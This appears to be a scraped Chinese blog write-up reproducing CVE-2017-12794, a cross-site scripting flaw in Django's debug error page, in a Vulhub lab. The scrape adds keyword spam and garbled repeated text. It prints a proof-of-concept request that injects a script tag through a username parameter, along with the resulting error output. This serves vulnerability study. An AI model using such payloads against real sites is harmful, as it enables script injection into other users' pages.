wap购物网站模板下载,wordpress首页tag标签调取,企业网站推广方案设计毕业设计,装修公司哪家好又便宜感谢互联网提供分享知识与智慧#xff0c;在法治的社会里#xff0c;请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞分析3、漏洞验证 说明内容漏洞编号CVE-2017-12794漏洞名称Django_debug page_XSS漏洞漏洞评级影响范… 感谢互联网提供分享知识与智慧在法治的社会里请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞分析3、漏洞验证 说明内容漏洞编号CVE-2017-12794漏洞名称Django_debug page_XSS漏洞漏洞评级影响范围1.11.5版本漏洞描述修复方案
1.1、漏洞描述
1.11.5版本修复了500页面中存在的一个XSS漏洞
1.2、漏洞等级
1.3、影响版本
Django 1.11.5版本
1.4、漏洞复现
1、基础环境
PathVulhub/django/CVE-2017-12794 启动测试环境
sudo docker-compose up -d访问http://your-ip:8000/即可看到 2、漏洞分析
vulhub
3、漏洞验证
http://192.168.8.8:8000/create_user/?username%3Cscript%3Ealert(1)%3C/script%3E用户已经被 创建 再次刷新页面触发XSS 抛出异常 duplicate key value violates unique constraint xss_user_username_key
DETAIL: Key (username)(scriptalert(1)/script) already exists.
